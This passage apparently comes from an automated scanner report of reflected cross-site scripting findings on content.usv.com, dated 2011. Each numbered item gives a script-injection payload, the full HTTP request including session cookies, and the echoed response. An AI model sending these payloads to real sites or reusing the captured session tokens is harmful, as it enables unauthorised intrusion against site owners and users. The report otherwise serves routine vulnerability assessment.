<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
e="text/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/f0bd6";alert(1)//aff4dbd7322/track/dot.gif";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document
...[SNIP]...

3.139. http://content.usv.com/pages/10gen [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/10gen

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fee4e"><script>alert(1)</script>27d7fd4aae7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesfee4e"><script>alert(1)</script>27d7fd4aae7/10gen HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; _chartbeat2=60p1quo02ok51v53.1317847385405; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.2.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.6.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:07 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31821
Date: Wed, 05 Oct 2011 20:45:07 GMT
X-Varnish: 1169902832
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesfee4e"><script>alert(1)</script>27d7fd4aae7/10gen%0AServer: content.usv.com%0APath: /pagesfee4e">
...[SNIP]...

3.140. http://content.usv.com/pages/10gen [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/10gen

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcf97"%3balert(1)//9bd0b370f83 was submitted in the REST URL parameter 1. This input was echoed as dcf97";alert(1)//9bd0b370f83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pagesdcf97"%3balert(1)//9bd0b370f83/10gen HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; _chartbeat2=60p1quo02ok51v53.1317847385405; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.2.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.6.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:08 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31718
Date: Wed, 05 Oct 2011 20:45:08 GMT
X-Varnish: 1169902914
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pagesdcf97";alert(1)//9bd0b370f83/10gen";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document.locatio
...[SNIP]...

3.141. http://content.usv.com/pages/albert-wenger [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/albert-wenger

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faa3a"><script>alert(1)</script>4e97ef34ae0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesfaa3a"><script>alert(1)</script>4e97ef34ae0/albert-wenger HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/team/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.9.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.22.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:20:06 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31849
Date: Wed, 05 Oct 2011 21:20:06 GMT
X-Varnish: 650613692
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesfaa3a"><script>alert(1)</script>4e97ef34ae0/albert-wenger%0AServer: content.usv.com%0APath: /pagesfaa3a">
...[SNIP]...

3.142. http://content.usv.com/pages/albert-wenger [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/albert-wenger

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1c91"%3balert(1)//c9804153238 was submitted in the REST URL parameter 1. This input was echoed as d1c91";alert(1)//c9804153238 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pagesd1c91"%3balert(1)//c9804153238/albert-wenger HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/team/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.9.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.22.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:20:07 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31744
Date: Wed, 05 Oct 2011 21:20:07 GMT
X-Varnish: 650613762
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pagesd1c91";alert(1)//c9804153238/albert-wenger";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document
...[SNIP]...

3.143. http://content.usv.com/pages/brad-burnham [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/brad-burnham

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 474ba"%3balert(1)//af9d30a255 was submitted in the REST URL parameter 1. This input was echoed as 474ba";alert(1)//af9d30a255 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages474ba"%3balert(1)//af9d30a255/brad-burnham HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/team/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.8.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.19.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:16:42 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31734
Date: Wed, 05 Oct 2011 21:16:42 GMT
X-Varnish: 650595333
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pages474ba";alert(1)//af9d30a255/brad-burnham";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document.
...[SNIP]...

3.144. http://content.usv.com/pages/brad-burnham [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/brad-burnham

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c834"><script>alert(1)</script>021193172a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages8c834"><script>alert(1)</script>021193172a9/brad-burnham HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/team/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.8.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.19.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:16:41 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31844
Date: Wed, 05 Oct 2011 21:16:42 GMT
X-Varnish: 650595245
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pages8c834"><script>alert(1)</script>021193172a9/brad-burnham%0AServer: content.usv.com%0APath: /pages8c834">
...[SNIP]...

3.145. http://content.usv.com/pages/bug-labs [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/bug-labs

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6003a"%3balert(1)//90e08d69bc0 was submitted in the REST URL parameter 1. This input was echoed as 6003a";alert(1)//90e08d69bc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages6003a"%3balert(1)//90e08d69bc0/bug-labs HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __qca=P0-1120347815-1317847383708; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.1.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.5.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:44:59 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31733
Date: Wed, 05 Oct 2011 20:44:59 GMT
X-Varnish: 1169902003
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pages6003a";alert(1)//90e08d69bc0/bug-labs";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document.loca
...[SNIP]...

3.146. http://content.usv.com/pages/bug-labs [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/bug-labs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c198e"><script>alert(1)</script>7641f5bdca4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesc198e"><script>alert(1)</script>7641f5bdca4/bug-labs HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __qca=P0-1120347815-1317847383708; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.1.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.5.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:44:58 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31838
Date: Wed, 05 Oct 2011 20:44:58 GMT
X-Varnish: 1169901890
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesc198e"><script>alert(1)</script>7641f5bdca4/bug-labs%0AServer: content.usv.com%0APath: /pagesc198e">
...[SNIP]...

3.147. http://content.usv.com/pages/canvas [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/canvas

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74aae"%3balert(1)//4ca3695d6d4 was submitted in the REST URL parameter 1. This input was echoed as 74aae";alert(1)//4ca3695d6d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages74aae"%3balert(1)//4ca3695d6d4/canvas HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; _chartbeat2=60p1quo02ok51v53.1317847385405; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.3.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.7.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:17 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31723
Date: Wed, 05 Oct 2011 20:45:17 GMT
X-Varnish: 1169903850
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pages74aae";alert(1)//4ca3695d6d4/canvas";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document.locati
...[SNIP]...

3.148. http://content.usv.com/pages/canvas [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/canvas

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72f0f"><script>alert(1)</script>d3ee7e4f618 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages72f0f"><script>alert(1)</script>d3ee7e4f618/canvas HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; _chartbeat2=60p1quo02ok51v53.1317847385405; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.3.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.7.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:15 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31828
Date: Wed, 05 Oct 2011 20:45:16 GMT
X-Varnish: 1169903748
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pages72f0f"><script>alert(1)</script>d3ee7e4f618/canvas%0AServer: content.usv.com%0APath: /pages72f0f">
...[SNIP]...

3.149. http://content.usv.com/pages/covestor [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/covestor

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1265d"%3balert(1)//705653a3bf2 was submitted in the REST URL parameter 1. This input was echoed as 1265d";alert(1)//705653a3bf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages1265d"%3balert(1)//705653a3bf2/covestor HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; _chartbeat2=60p1quo02ok51v53.1317847385405; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.6.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.18.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:04:16 GMT
